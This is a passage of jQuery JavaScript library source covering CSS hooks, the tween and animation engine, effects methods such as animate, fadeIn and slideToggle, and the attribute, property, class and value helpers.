		// If a hook was provided get the computed value from there
		if ( hooks && "get" in hooks ) {
			val = hooks.get( elem, true, extra );
		}

		// Otherwise, if a way to get the computed value exists, use that
		if ( val === undefined ) {
			val = curCSS( elem, name, styles );
		}

		// Convert "normal" to computed value
		if ( val === "normal" && name in cssNormalTransform ) {
			val = cssNormalTransform[ name ];
		}

		// Make numeric if forced or a qualifier was provided and val looks numeric
		if ( extra === "" || extra ) {
			num = parseFloat( val );
			return extra === true || jQuery.isNumeric( num ) ? num || 0 : val;
		}
		return val;
	}
});

jQuery.each([ "height", "width" ], function( i, name ) {
	jQuery.cssHooks[ name ] = {
		get: function( elem, computed, extra ) {
			if ( computed ) {

				// Certain elements can have dimension info if we invisibly show them
				// but it must have a current display style that would benefit
				return rdisplayswap.test( jQuery.css( elem, "display" ) ) && elem.offsetWidth === 0 ?
					jQuery.swap( elem, cssShow, function() {
						return getWidthOrHeight( elem, name, extra );
					}) :
					getWidthOrHeight( elem, name, extra );
			}
		},

		set: function( elem, value, extra ) {
			var styles = extra && getStyles( elem );
			return setPositiveNumber( elem, value, extra ?
				augmentWidthOrHeight(
					elem,
					name,
					extra,
					jQuery.css( elem, "boxSizing", false, styles ) === "border-box",
					styles
				) : 0
			);
		}
	};
});

// Support: Android 2.3
jQuery.cssHooks.marginRight = addGetHookIf( support.reliableMarginRight,
	function( elem, computed ) {
		if ( computed ) {
			return jQuery.swap( elem, { "display": "inline-block" },
				curCSS, [ elem, "marginRight" ] );
		}
	}
);

// These hooks are used by animate to expand properties
jQuery.each({
	margin: "",
	padding: "",
	border: "Width"
}, function( prefix, suffix ) {
	jQuery.cssHooks[ prefix + suffix ] = {
		expand: function( value ) {
			var i = 0,
				expanded = {},

				// Assumes a single number if not a string
				parts = typeof value === "string" ? value.split(" ") : [ value ];

			for ( ; i < 4; i++ ) {
				expanded[ prefix + cssExpand[ i ] + suffix ] =
					parts[ i ] || parts[ i - 2 ] || parts[ 0 ];
			}

			return expanded;
		}
	};

	if ( !rmargin.test( prefix ) ) {
		jQuery.cssHooks[ prefix + suffix ].set = setPositiveNumber;
	}
});

jQuery.fn.extend({
	css: function( name, value ) {
		return access( this, function( elem, name, value ) {
			var styles, len,
				map = {},
				i = 0;

			if ( jQuery.isArray( name ) ) {
				styles = getStyles( elem );
				len = name.length;

				for ( ; i < len; i++ ) {
					map[ name[ i ] ] = jQuery.css( elem, name[ i ], false, styles );
				}

				return map;
			}

			return value !== undefined ?
				jQuery.style( elem, name, value ) :
				jQuery.css( elem, name );
		}, name, value, arguments.length > 1 );
	},
	show: function() {
		return showHide( this, true );
	},
	hide: function() {
		return showHide( this );
	},
	toggle: function( state ) {
		if ( typeof state === "boolean" ) {
			return state ? this.show() : this.hide();
		}

		return this.each(function() {
			if ( isHidden( this ) ) {
				jQuery( this ).show();
			} else {
				jQuery( this ).hide();
			}
		});
	}
});


function Tween( elem, options, prop, end, easing ) {
	return new Tween.prototype.init( elem, options, prop, end, easing );
}
jQuery.Tween = Tween;

Tween.prototype = {
	constructor: Tween,
	init: function( elem, options, prop, end, easing, unit ) {
		this.elem = elem;
		this.prop = prop;
		this.easing = easing || "swing";
		this.options = options;
		this.start = this.now = this.cur();
		this.end = end;
		this.unit = unit || ( jQuery.cssNumber[ prop ] ? "" : "px" );
	},
	cur: function() {
		var hooks = Tween.propHooks[ this.prop ];

		return hooks && hooks.get ?
			hooks.get( this ) :
			Tween.propHooks._default.get( this );
	},
	run: function( percent ) {
		var eased,
			hooks = Tween.propHooks[ this.prop ];

		if ( this.options.duration ) {
			this.pos = eased = jQuery.easing[ this.easing ](
				percent, this.options.duration * percent, 0, 1, this.options.duration
			);
		} else {
			this.pos = eased = percent;
		}
		this.now = ( this.end - this.start ) * eased + this.start;

		if ( this.options.step ) {
			this.options.step.call( this.elem, this.now, this );
		}

		if ( hooks && hooks.set ) {
			hooks.set( this );
		} else {
			Tween.propHooks._default.set( this );
		}
		return this;
	}
};

Tween.prototype.init.prototype = Tween.prototype;

Tween.propHooks = {
	_default: {
		get: function( tween ) {
			var result;

			if ( tween.elem[ tween.prop ] != null &&
				(!tween.elem.style || tween.elem.style[ tween.prop ] == null) ) {
				return tween.elem[ tween.prop ];
			}

			// Passing an empty string as a 3rd parameter to .css will automatically
			// attempt a parseFloat and fallback to a string if the parse fails.
			// Simple values such as "10px" are parsed to Float;
			// complex values such as "rotate(1rad)" are returned as-is.
			result = jQuery.css( tween.elem, tween.prop, "" );
			// Empty strings, null, undefined and "auto" are converted to 0.
			return !result || result === "auto" ? 0 : result;
		},
		set: function( tween ) {
			// Use step hook for back compat.
			// Use cssHook if its there.
			// Use .style if available and use plain properties where available.
			if ( jQuery.fx.step[ tween.prop ] ) {
				jQuery.fx.step[ tween.prop ]( tween );
			} else if ( tween.elem.style && ( tween.elem.style[ jQuery.cssProps[ tween.prop ] ] != null || jQuery.cssHooks[ tween.prop ] ) ) {
				jQuery.style( tween.elem, tween.prop, tween.now + tween.unit );
			} else {
				tween.elem[ tween.prop ] = tween.now;
			}
		}
	}
};

// Support: IE9
// Panic based approach to setting things on disconnected nodes
Tween.propHooks.scrollTop = Tween.propHooks.scrollLeft = {
	set: function( tween ) {
		if ( tween.elem.nodeType && tween.elem.parentNode ) {
			tween.elem[ tween.prop ] = tween.now;
		}
	}
};

jQuery.easing = {
	linear: function( p ) {
		return p;
	},
	swing: function( p ) {
		return 0.5 - Math.cos( p * Math.PI ) / 2;
	}
};

jQuery.fx = Tween.prototype.init;

// Back Compat <1.8 extension point
jQuery.fx.step = {};




var
	fxNow, timerId,
	rfxtypes = /^(?:toggle|show|hide)$/,
	rfxnum = new RegExp( "^(?:([+-])=|)(" + pnum + ")([a-z%]*)$", "i" ),
	rrun = /queueHooks$/,
	animationPrefilters = [ defaultPrefilter ],
	tweeners = {
		"*": [ function( prop, value ) {
			var tween = this.createTween( prop, value ),
				target = tween.cur(),
				parts = rfxnum.exec( value ),
				unit = parts && parts[ 3 ] || ( jQuery.cssNumber[ prop ] ? "" : "px" ),

				// Starting value computation is required for potential unit mismatches
				start = ( jQuery.cssNumber[ prop ] || unit !== "px" && +target ) &&
					rfxnum.exec( jQuery.css( tween.elem, prop ) ),
				scale = 1,
				maxIterations = 20;

			if ( start && start[ 3 ] !== unit ) {
				// Trust units reported by jQuery.css
				unit = unit || start[ 3 ];

				// Make sure we update the tween properties later on
				parts = parts || [];

				// Iteratively approximate from a nonzero starting point
				start = +target || 1;

				do {
					// If previous iteration zeroed out, double until we get *something*.
					// Use string for doubling so we don't accidentally see scale as unchanged below
					scale = scale || ".5";

					// Adjust and apply
					start = start / scale;
					jQuery.style( tween.elem, prop, start + unit );

				// Update scale, tolerating zero or NaN from tween.cur(),
				// break the loop if scale is unchanged or perfect, or if we've just had enough
				} while ( scale !== (scale = tween.cur() / target) && scale !== 1 && --maxIterations );
			}

			// Update tween properties
			if ( parts ) {
				start = tween.start = +start || +target || 0;
				tween.unit = unit;
				// If a +=/-= token was provided, we're doing a relative animation
				tween.end = parts[ 1 ] ?
					start + ( parts[ 1 ] + 1 ) * parts[ 2 ] :
					+parts[ 2 ];
			}

			return tween;
		} ]
	};

// Animations created synchronously will run synchronously
function createFxNow() {
	setTimeout(function() {
		fxNow = undefined;
	});
	return ( fxNow = jQuery.now() );
}

// Generate parameters to create a standard animation
function genFx( type, includeWidth ) {
	var which,
		i = 0,
		attrs = { height: type };

	// If we include width, step value is 1 to do all cssExpand values,
	// otherwise step value is 2 to skip over Left and Right
	includeWidth = includeWidth ? 1 : 0;
	for ( ; i < 4 ; i += 2 - includeWidth ) {
		which = cssExpand[ i ];
		attrs[ "margin" + which ] = attrs[ "padding" + which ] = type;
	}

	if ( includeWidth ) {
		attrs.opacity = attrs.width = type;
	}

	return attrs;
}

function createTween( value, prop, animation ) {
	var tween,
		collection = ( tweeners[ prop ] || [] ).concat( tweeners[ "*" ] ),
		index = 0,
		length = collection.length;
	for ( ; index < length; index++ ) {
		if ( (tween = collection[ index ].call( animation, prop, value )) ) {

			// We're done with this property
			return tween;
		}
	}
}

function defaultPrefilter( elem, props, opts ) {
	/* jshint validthis: true */
	var prop, value, toggle, tween, hooks, oldfire, display, checkDisplay,
		anim = this,
		orig = {},
		style = elem.style,
		hidden = elem.nodeType && isHidden( elem ),
		dataShow = data_priv.get( elem, "fxshow" );

	// Handle queue: false promises
	if ( !opts.queue ) {
		hooks = jQuery._queueHooks( elem, "fx" );
		if ( hooks.unqueued == null ) {
			hooks.unqueued = 0;
			oldfire = hooks.empty.fire;
			hooks.empty.fire = function() {
				if ( !hooks.unqueued ) {
					oldfire();
				}
			};
		}
		hooks.unqueued++;

		anim.always(function() {
			// Ensure the complete handler is called before this completes
			anim.always(function() {
				hooks.unqueued--;
				if ( !jQuery.queue( elem, "fx" ).length ) {
					hooks.empty.fire();
				}
			});
		});
	}

	// Height/width overflow pass
	if ( elem.nodeType === 1 && ( "height" in props || "width" in props ) ) {
		// Make sure that nothing sneaks out
		// Record all 3 overflow attributes because IE9-10 do not
		// change the overflow attribute when overflowX and
		// overflowY are set to the same value
		opts.overflow = [ style.overflow, style.overflowX, style.overflowY ];

		// Set display property to inline-block for height/width
		// animations on inline elements that are having width/height animated
		display = jQuery.css( elem, "display" );

		// Test default display if display is currently "none"
		checkDisplay = display === "none" ?
			data_priv.get( elem, "olddisplay" ) || defaultDisplay( elem.nodeName ) : display;

		if ( checkDisplay === "inline" && jQuery.css( elem, "float" ) === "none" ) {
			style.display = "inline-block";
		}
	}

	if ( opts.overflow ) {
		style.overflow = "hidden";
		anim.always(function() {
			style.overflow = opts.overflow[ 0 ];
			style.overflowX = opts.overflow[ 1 ];
			style.overflowY = opts.overflow[ 2 ];
		});
	}

	// show/hide pass
	for ( prop in props ) {
		value = props[ prop ];
		if ( rfxtypes.exec( value ) ) {
			delete props[ prop ];
			toggle = toggle || value === "toggle";
			if ( value === ( hidden ? "hide" : "show" ) ) {

				// If there is dataShow left over from a stopped hide or show and we are going to proceed with show, we should pretend to be hidden
				if ( value === "show" && dataShow && dataShow[ prop ] !== undefined ) {
					hidden = true;
				} else {
					continue;
				}
			}
			orig[ prop ] = dataShow && dataShow[ prop ] || jQuery.style( elem, prop );

		// Any non-fx value stops us from restoring the original display value
		} else {
			display = undefined;
		}
	}

	if ( !jQuery.isEmptyObject( orig ) ) {
		if ( dataShow ) {
			if ( "hidden" in dataShow ) {
				hidden = dataShow.hidden;
			}
		} else {
			dataShow = data_priv.access( elem, "fxshow", {} );
		}

		// Store state if its toggle - enables .stop().toggle() to "reverse"
		if ( toggle ) {
			dataShow.hidden = !hidden;
		}
		if ( hidden ) {
			jQuery( elem ).show();
		} else {
			anim.done(function() {
				jQuery( elem ).hide();
			});
		}
		anim.done(function() {
			var prop;

			data_priv.remove( elem, "fxshow" );
			for ( prop in orig ) {
				jQuery.style( elem, prop, orig[ prop ] );
			}
		});
		for ( prop in orig ) {
			tween = createTween( hidden ? dataShow[ prop ] : 0, prop, anim );

			if ( !( prop in dataShow ) ) {
				dataShow[ prop ] = tween.start;
				if ( hidden ) {
					tween.end = tween.start;
					tween.start = prop === "width" || prop === "height" ? 1 : 0;
				}
			}
		}

	// If this is a noop like .hide().hide(), restore an overwritten display value
	} else if ( (display === "none" ? defaultDisplay( elem.nodeName ) : display) === "inline" ) {
		style.display = display;
	}
}

function propFilter( props, specialEasing ) {
	var index, name, easing, value, hooks;

	// camelCase, specialEasing and expand cssHook pass
	for ( index in props ) {
		name = jQuery.camelCase( index );
		easing = specialEasing[ name ];
		value = props[ index ];
		if ( jQuery.isArray( value ) ) {
			easing = value[ 1 ];
			value = props[ index ] = value[ 0 ];
		}

		if ( index !== name ) {
			props[ name ] = value;
			delete props[ index ];
		}

		hooks = jQuery.cssHooks[ name ];
		if ( hooks && "expand" in hooks ) {
			value = hooks.expand( value );
			delete props[ name ];

			// Not quite $.extend, this won't overwrite existing keys.
			// Reusing 'index' because we have the correct "name"
			for ( index in value ) {
				if ( !( index in props ) ) {
					props[ index ] = value[ index ];
					specialEasing[ index ] = easing;
				}
			}
		} else {
			specialEasing[ name ] = easing;
		}
	}
}

function Animation( elem, properties, options ) {
	var result,
		stopped,
		index = 0,
		length = animationPrefilters.length,
		deferred = jQuery.Deferred().always( function() {
			// Don't match elem in the :animated selector
			delete tick.elem;
		}),
		tick = function() {
			if ( stopped ) {
				return false;
			}
			var currentTime = fxNow || createFxNow(),
				remaining = Math.max( 0, animation.startTime + animation.duration - currentTime ),
				// Support: Android 2.3
				// Archaic crash bug won't allow us to use `1 - ( 0.5 || 0 )` (#12497)
				temp = remaining / animation.duration || 0,
				percent = 1 - temp,
				index = 0,
				length = animation.tweens.length;

			for ( ; index < length ; index++ ) {
				animation.tweens[ index ].run( percent );
			}

			deferred.notifyWith( elem, [ animation, percent, remaining ]);

			if ( percent < 1 && length ) {
				return remaining;
			} else {
				deferred.resolveWith( elem, [ animation ] );
				return false;
			}
		},
		animation = deferred.promise({
			elem: elem,
			props: jQuery.extend( {}, properties ),
			opts: jQuery.extend( true, { specialEasing: {} }, options ),
			originalProperties: properties,
			originalOptions: options,
			startTime: fxNow || createFxNow(),
			duration: options.duration,
			tweens: [],
			createTween: function( prop, end ) {
				var tween = jQuery.Tween( elem, animation.opts, prop, end,
						animation.opts.specialEasing[ prop ] || animation.opts.easing );
				animation.tweens.push( tween );
				return tween;
			},
			stop: function( gotoEnd ) {
				var index = 0,
					// If we are going to the end, we want to run all the tweens
					// otherwise we skip this part
					length = gotoEnd ? animation.tweens.length : 0;
				if ( stopped ) {
					return this;
				}
				stopped = true;
				for ( ; index < length ; index++ ) {
					animation.tweens[ index ].run( 1 );
				}

				// Resolve when we played the last frame; otherwise, reject
				if ( gotoEnd ) {
					deferred.resolveWith( elem, [ animation, gotoEnd ] );
				} else {
					deferred.rejectWith( elem, [ animation, gotoEnd ] );
				}
				return this;
			}
		}),
		props = animation.props;

	propFilter( props, animation.opts.specialEasing );

	for ( ; index < length ; index++ ) {
		result = animationPrefilters[ index ].call( animation, elem, props, animation.opts );
		if ( result ) {
			return result;
		}
	}

	jQuery.map( props, createTween, animation );

	if ( jQuery.isFunction( animation.opts.start ) ) {
		animation.opts.start.call( elem, animation );
	}

	jQuery.fx.timer(
		jQuery.extend( tick, {
			elem: elem,
			anim: animation,
			queue: animation.opts.queue
		})
	);

	// attach callbacks from options
	return animation.progress( animation.opts.progress )
		.done( animation.opts.done, animation.opts.complete )
		.fail( animation.opts.fail )
		.always( animation.opts.always );
}

jQuery.Animation = jQuery.extend( Animation, {

	tweener: function( props, callback ) {
		if ( jQuery.isFunction( props ) ) {
			callback = props;
			props = [ "*" ];
		} else {
			props = props.split(" ");
		}

		var prop,
			index = 0,
			length = props.length;

		for ( ; index < length ; index++ ) {
			prop = props[ index ];
			tweeners[ prop ] = tweeners[ prop ] || [];
			tweeners[ prop ].unshift( callback );
		}
	},

	prefilter: function( callback, prepend ) {
		if ( prepend ) {
			animationPrefilters.unshift( callback );
		} else {
			animationPrefilters.push( callback );
		}
	}
});

jQuery.speed = function( speed, easing, fn ) {
	var opt = speed && typeof speed === "object" ? jQuery.extend( {}, speed ) : {
		complete: fn || !fn && easing ||
			jQuery.isFunction( speed ) && speed,
		duration: speed,
		easing: fn && easing || easing && !jQuery.isFunction( easing ) && easing
	};

	opt.duration = jQuery.fx.off ? 0 : typeof opt.duration === "number" ? opt.duration :
		opt.duration in jQuery.fx.speeds ? jQuery.fx.speeds[ opt.duration ] : jQuery.fx.speeds._default;

	// Normalize opt.queue - true/undefined/null -> "fx"
	if ( opt.queue == null || opt.queue === true ) {
		opt.queue = "fx";
	}

	// Queueing
	opt.old = opt.complete;

	opt.complete = function() {
		if ( jQuery.isFunction( opt.old ) ) {
			opt.old.call( this );
		}

		if ( opt.queue ) {
			jQuery.dequeue( this, opt.queue );
		}
	};

	return opt;
};

jQuery.fn.extend({
	fadeTo: function( speed, to, easing, callback ) {

		// Show any hidden elements after setting opacity to 0
		return this.filter( isHidden ).css( "opacity", 0 ).show()

			// Animate to the value specified
			.end().animate({ opacity: to }, speed, easing, callback );
	},
	animate: function( prop, speed, easing, callback ) {
		var empty = jQuery.isEmptyObject( prop ),
			optall = jQuery.speed( speed, easing, callback ),
			doAnimation = function() {
				// Operate on a copy of prop so per-property easing won't be lost
				var anim = Animation( this, jQuery.extend( {}, prop ), optall );

				// Empty animations, or finishing resolves immediately
				if ( empty || data_priv.get( this, "finish" ) ) {
					anim.stop( true );
				}
			};
			doAnimation.finish = doAnimation;

		return empty || optall.queue === false ?
			this.each( doAnimation ) :
			this.queue( optall.queue, doAnimation );
	},
	stop: function( type, clearQueue, gotoEnd ) {
		var stopQueue = function( hooks ) {
			var stop = hooks.stop;
			delete hooks.stop;
			stop( gotoEnd );
		};

		if ( typeof type !== "string" ) {
			gotoEnd = clearQueue;
			clearQueue = type;
			type = undefined;
		}
		if ( clearQueue && type !== false ) {
			this.queue( type || "fx", [] );
		}

		return this.each(function() {
			var dequeue = true,
				index = type != null && type + "queueHooks",
				timers = jQuery.timers,
				data = data_priv.get( this );

			if ( index ) {
				if ( data[ index ] && data[ index ].stop ) {
					stopQueue( data[ index ] );
				}
			} else {
				for ( index in data ) {
					if ( data[ index ] && data[ index ].stop && rrun.test( index ) ) {
						stopQueue( data[ index ] );
					}
				}
			}

			for ( index = timers.length; index--; ) {
				if ( timers[ index ].elem === this && (type == null || timers[ index ].queue === type) ) {
					timers[ index ].anim.stop( gotoEnd );
					dequeue = false;
					timers.splice( index, 1 );
				}
			}

			// Start the next in the queue if the last step wasn't forced.
			// Timers currently will call their complete callbacks, which
			// will dequeue but only if they were gotoEnd.
			if ( dequeue || !gotoEnd ) {
				jQuery.dequeue( this, type );
			}
		});
	},
	finish: function( type ) {
		if ( type !== false ) {
			type = type || "fx";
		}
		return this.each(function() {
			var index,
				data = data_priv.get( this ),
				queue = data[ type + "queue" ],
				hooks = data[ type + "queueHooks" ],
				timers = jQuery.timers,
				length = queue ? queue.length : 0;

			// Enable finishing flag on private data
			data.finish = true;

			// Empty the queue first
			jQuery.queue( this, type, [] );

			if ( hooks && hooks.stop ) {
				hooks.stop.call( this, true );
			}

			// Look for any active animations, and finish them
			for ( index = timers.length; index--; ) {
				if ( timers[ index ].elem === this && timers[ index ].queue === type ) {
					timers[ index ].anim.stop( true );
					timers.splice( index, 1 );
				}
			}

			// Look for any animations in the old queue and finish them
			for ( index = 0; index < length; index++ ) {
				if ( queue[ index ] && queue[ index ].finish ) {
					queue[ index ].finish.call( this );
				}
			}

			// Turn off finishing flag
			delete data.finish;
		});
	}
});

jQuery.each([ "toggle", "show", "hide" ], function( i, name ) {
	var cssFn = jQuery.fn[ name ];
	jQuery.fn[ name ] = function( speed, easing, callback ) {
		return speed == null || typeof speed === "boolean" ?
			cssFn.apply( this, arguments ) :
			this.animate( genFx( name, true ), speed, easing, callback );
	};
});

// Generate shortcuts for custom animations
jQuery.each({
	slideDown: genFx("show"),
	slideUp: genFx("hide"),
	slideToggle: genFx("toggle"),
	fadeIn: { opacity: "show" },
	fadeOut: { opacity: "hide" },
	fadeToggle: { opacity: "toggle" }
}, function( name, props ) {
	jQuery.fn[ name ] = function( speed, easing, callback ) {
		return this.animate( props, speed, easing, callback );
	};
});

jQuery.timers = [];
jQuery.fx.tick = function() {
	var timer,
		i = 0,
		timers = jQuery.timers;

	fxNow = jQuery.now();

	for ( ; i < timers.length; i++ ) {
		timer = timers[ i ];
		// Checks the timer has not already been removed
		if ( !timer() && timers[ i ] === timer ) {
			timers.splice( i--, 1 );
		}
	}

	if ( !timers.length ) {
		jQuery.fx.stop();
	}
	fxNow = undefined;
};

jQuery.fx.timer = function( timer ) {
	jQuery.timers.push( timer );
	if ( timer() ) {
		jQuery.fx.start();
	} else {
		jQuery.timers.pop();
	}
};

jQuery.fx.interval = 13;

jQuery.fx.start = function() {
	if ( !timerId ) {
		timerId = setInterval( jQuery.fx.tick, jQuery.fx.interval );
	}
};

jQuery.fx.stop = function() {
	clearInterval( timerId );
	timerId = null;
};

jQuery.fx.speeds = {
	slow: 600,
	fast: 200,
	// Default speed
	_default: 400
};


// Based off of the plugin by Clint Helfers, with permission.
// http://blindsignals.com/index.php/2009/07/jquery-delay/
jQuery.fn.delay = function( time, type ) {
	time = jQuery.fx ? jQuery.fx.speeds[ time ] || time : time;
	type = type || "fx";

	return this.queue( type, function( next, hooks ) {
		var timeout = setTimeout( next, time );
		hooks.stop = function() {
			clearTimeout( timeout );
		};
	});
};


(function() {
	var input = document.createElement( "input" ),
		select = document.createElement( "select" ),
		opt = select.appendChild( document.createElement( "option" ) );

	input.type = "checkbox";

	// Support: iOS<=5.1, Android<=4.2+
	// Default value for a checkbox should be "on"
	support.checkOn = input.value !== "";

	// Support: IE<=11+
	// Must access selectedIndex to make default options select
	support.optSelected = opt.selected;

	// Support: Android<=2.3
	// Options inside disabled selects are incorrectly marked as disabled
	select.disabled = true;
	support.optDisabled = !opt.disabled;

	// Support: IE<=11+
	// An input loses its value after becoming a radio
	input = document.createElement( "input" );
	input.value = "t";
	input.type = "radio";
	support.radioValue = input.value === "t";
})();


var nodeHook, boolHook,
	attrHandle = jQuery.expr.attrHandle;

jQuery.fn.extend({
	attr: function( name, value ) {
		return access( this, jQuery.attr, name, value, arguments.length > 1 );
	},

	removeAttr: function( name ) {
		return this.each(function() {
			jQuery.removeAttr( this, name );
		});
	}
});

jQuery.extend({
	attr: function( elem, name, value ) {
		var hooks, ret,
			nType = elem.nodeType;

		// don't get/set attributes on text, comment and attribute nodes
		if ( !elem || nType === 3 || nType === 8 || nType === 2 ) {
			return;
		}

		// Fallback to prop when attributes are not supported
		if ( typeof elem.getAttribute === strundefined ) {
			return jQuery.prop( elem, name, value );
		}

		// All attributes are lowercase
		// Grab necessary hook if one is defined
		if ( nType !== 1 || !jQuery.isXMLDoc( elem ) ) {
			name = name.toLowerCase();
			hooks = jQuery.attrHooks[ name ] ||
				( jQuery.expr.match.bool.test( name ) ? boolHook : nodeHook );
		}

		if ( value !== undefined ) {

			if ( value === null ) {
				jQuery.removeAttr( elem, name );

			} else if ( hooks && "set" in hooks && (ret = hooks.set( elem, value, name )) !== undefined ) {
				return ret;

			} else {
				elem.setAttribute( name, value + "" );
				return value;
			}

		} else if ( hooks && "get" in hooks && (ret = hooks.get( elem, name )) !== null ) {
			return ret;

		} else {
			ret = jQuery.find.attr( elem, name );

			// Non-existent attributes return null, we normalize to undefined
			return ret == null ?
				undefined :
				ret;
		}
	},

	removeAttr: function( elem, value ) {
		var name, propName,
			i = 0,
			attrNames = value && value.match( rnotwhite );

		if ( attrNames && elem.nodeType === 1 ) {
			while ( (name = attrNames[i++]) ) {
				propName = jQuery.propFix[ name ] || name;

				// Boolean attributes get special treatment (#10870)
				if ( jQuery.expr.match.bool.test( name ) ) {
					// Set corresponding property to false
					elem[ propName ] = false;
				}

				elem.removeAttribute( name );
			}
		}
	},

	attrHooks: {
		type: {
			set: function( elem, value ) {
				if ( !support.radioValue && value === "radio" &&
					jQuery.nodeName( elem, "input" ) ) {
					var val = elem.value;
					elem.setAttribute( "type", value );
					if ( val ) {
						elem.value = val;
					}
					return value;
				}
			}
		}
	}
});

// Hooks for boolean attributes
boolHook = {
	set: function( elem, value, name ) {
		if ( value === false ) {
			// Remove boolean attributes when set to false
			jQuery.removeAttr( elem, name );
		} else {
			elem.setAttribute( name, name );
		}
		return name;
	}
};
jQuery.each( jQuery.expr.match.bool.source.match( /\w+/g ), function( i, name ) {
	var getter = attrHandle[ name ] || jQuery.find.attr;

	attrHandle[ name ] = function( elem, name, isXML ) {
		var ret, handle;
		if ( !isXML ) {
			// Avoid an infinite loop by temporarily removing this function from the getter
			handle = attrHandle[ name ];
			attrHandle[ name ] = ret;
			ret = getter( elem, name, isXML ) != null ?
				name.toLowerCase() :
				null;
			attrHandle[ name ] = handle;
		}
		return ret;
	};
});




var rfocusable = /^(?:input|select|textarea|button)$/i;

jQuery.fn.extend({
	prop: function( name, value ) {
		return access( this, jQuery.prop, name, value, arguments.length > 1 );
	},

	removeProp: function( name ) {
		return this.each(function() {
			delete this[ jQuery.propFix[ name ] || name ];
		});
	}
});

jQuery.extend({
	propFix: {
		"for": "htmlFor",
		"class": "className"
	},

	prop: function( elem, name, value ) {
		var ret, hooks, notxml,
			nType = elem.nodeType;

		// Don't get/set properties on text, comment and attribute nodes
		if ( !elem || nType === 3 || nType === 8 || nType === 2 ) {
			return;
		}

		notxml = nType !== 1 || !jQuery.isXMLDoc( elem );

		if ( notxml ) {
			// Fix name and attach hooks
			name = jQuery.propFix[ name ] || name;
			hooks = jQuery.propHooks[ name ];
		}

		if ( value !== undefined ) {
			return hooks && "set" in hooks && (ret = hooks.set( elem, value, name )) !== undefined ?
				ret :
				( elem[ name ] = value );

		} else {
			return hooks && "get" in hooks && (ret = hooks.get( elem, name )) !== null ?
				ret :
				elem[ name ];
		}
	},

	propHooks: {
		tabIndex: {
			get: function( elem ) {
				return elem.hasAttribute( "tabindex" ) || rfocusable.test( elem.nodeName ) || elem.href ?
					elem.tabIndex :
					-1;
			}
		}
	}
});

if ( !support.optSelected ) {
	jQuery.propHooks.selected = {
		get: function( elem ) {
			var parent = elem.parentNode;
			if ( parent && parent.parentNode ) {
				parent.parentNode.selectedIndex;
			}
			return null;
		}
	};
}

jQuery.each([
	"tabIndex",
	"readOnly",
	"maxLength",
	"cellSpacing",
	"cellPadding",
	"rowSpan",
	"colSpan",
	"useMap",
	"frameBorder",
	"contentEditable"
], function() {
	jQuery.propFix[ this.toLowerCase() ] = this;
});




var rclass = /[\t\r\n\f]/g;

jQuery.fn.extend({
	addClass: function( value ) {
		var classes, elem, cur, clazz, j, finalValue,
			proceed = typeof value === "string" && value,
			i = 0,
			len = this.length;

		if ( jQuery.isFunction( value ) ) {
			return this.each(function( j ) {
				jQuery( this ).addClass( value.call( this, j, this.className ) );
			});
		}

		if ( proceed ) {
			// The disjunction here is for better compressibility (see removeClass)
			classes = ( value || "" ).match( rnotwhite ) || [];

			for ( ; i < len; i++ ) {
				elem = this[ i ];
				cur = elem.nodeType === 1 && ( elem.className ?
					( " " + elem.className + " " ).replace( rclass, " " ) :
					" "
				);

				if ( cur ) {
					j = 0;
					while ( (clazz = classes[j++]) ) {
						if ( cur.indexOf( " " + clazz + " " ) < 0 ) {
							cur += clazz + " ";
						}
					}

					// only assign if different to avoid unneeded rendering.
					finalValue = jQuery.trim( cur );
					if ( elem.className !== finalValue ) {
						elem.className = finalValue;
					}
				}
			}
		}

		return this;
	},

	removeClass: function( value ) {
		var classes, elem, cur, clazz, j, finalValue,
			proceed = arguments.length === 0 || typeof value === "string" && value,
			i = 0,
			len = this.length;

		if ( jQuery.isFunction( value ) ) {
			return this.each(function( j ) {
				jQuery( this ).removeClass( value.call( this, j, this.className ) );
			});
		}
		if ( proceed ) {
			classes = ( value || "" ).match( rnotwhite ) || [];

			for ( ; i < len; i++ ) {
				elem = this[ i ];
				// This expression is here for better compressibility (see addClass)
				cur = elem.nodeType === 1 && ( elem.className ?
					( " " + elem.className + " " ).replace( rclass, " " ) :
					""
				);

				if ( cur ) {
					j = 0;
					while ( (clazz = classes[j++]) ) {
						// Remove *all* instances
						while ( cur.indexOf( " " + clazz + " " ) >= 0 ) {
							cur = cur.replace( " " + clazz + " ", " " );
						}
					}

					// Only assign if different to avoid unneeded rendering.
					finalValue = value ? jQuery.trim( cur ) : "";
					if ( elem.className !== finalValue ) {
						elem.className = finalValue;
					}
				}
			}
		}

		return this;
	},

	toggleClass: function( value, stateVal ) {
		var type = typeof value;

		if ( typeof stateVal === "boolean" && type === "string" ) {
			return stateVal ? this.addClass( value ) : this.removeClass( value );
		}

		if ( jQuery.isFunction( value ) ) {
			return this.each(function( i ) {
				jQuery( this ).toggleClass( value.call(this, i, this.className, stateVal), stateVal );
			});
		}

		return this.each(function() {
			if ( type === "string" ) {
				// Toggle individual class names
				var className,
					i = 0,
					self = jQuery( this ),
					classNames = value.match( rnotwhite ) || [];

				while ( (className = classNames[ i++ ]) ) {
					// Check each className given, space separated list
					if ( self.hasClass( className ) ) {
						self.removeClass( className );
					} else {
						self.addClass( className );
					}
				}

			// Toggle whole class name
			} else if ( type === strundefined || type === "boolean" ) {
				if ( this.className ) {
					// store className if set
					data_priv.set( this, "__className__", this.className );
				}

				// If the element has a class name or if we're passed `false`,
				// then remove the whole classname (if there was one, the above saved it).
				// Otherwise bring back whatever was previously saved (if anything),
				// falling back to the empty string if nothing was stored.
				this.className = this.className || value === false ? "" : data_priv.get( this, "__className__" ) || "";
			}
		});
	},

	hasClass: function( selector ) {
		var className = " " + selector + " ",
			i = 0,
			l = this.length;
		for ( ; i < l; i++ ) {
			if ( this[i].nodeType === 1 && (" " + this[i].className + " ").replace(rclass, " ").indexOf( className ) >= 0 ) {
				return true;
			}
		}

		return false;
	}
});




var rreturn = /\r/g;

jQuery.fn.extend({
	val: function( value ) {
		var hooks, ret, isFunction,
			elem = this[0];

		if ( !arguments.length ) {
			if ( elem ) {
				hooks = jQuery.valHooks[ elem.type ] || jQuery.valHooks[ elem.nodeName.toLowerCase() ];

				if ( hooks && "get" in hooks && (ret = hooks.get( elem, "value" )) !== undefined ) {
					return ret;
				}

				ret = elem.value;

				return typeof ret === "string" ?
					// Handle most common string cases
					ret.replace(rreturn, "") :
					// Handle cases where value is null/undef or number
					ret == null ? "" : ret;
			}

			return;
		}

		isFunction = jQuery.isFunction( value );

		return this.each(function( i ) {
			var val;

			if ( this.nodeType !== 1 ) {
				return;
			}

			if ( isFunction ) {
				val = value.call( this, i, jQuery( this ).val() );
			} else {
				val = value;
			}

			// Treat null/undefined as ""; convert numbers to string
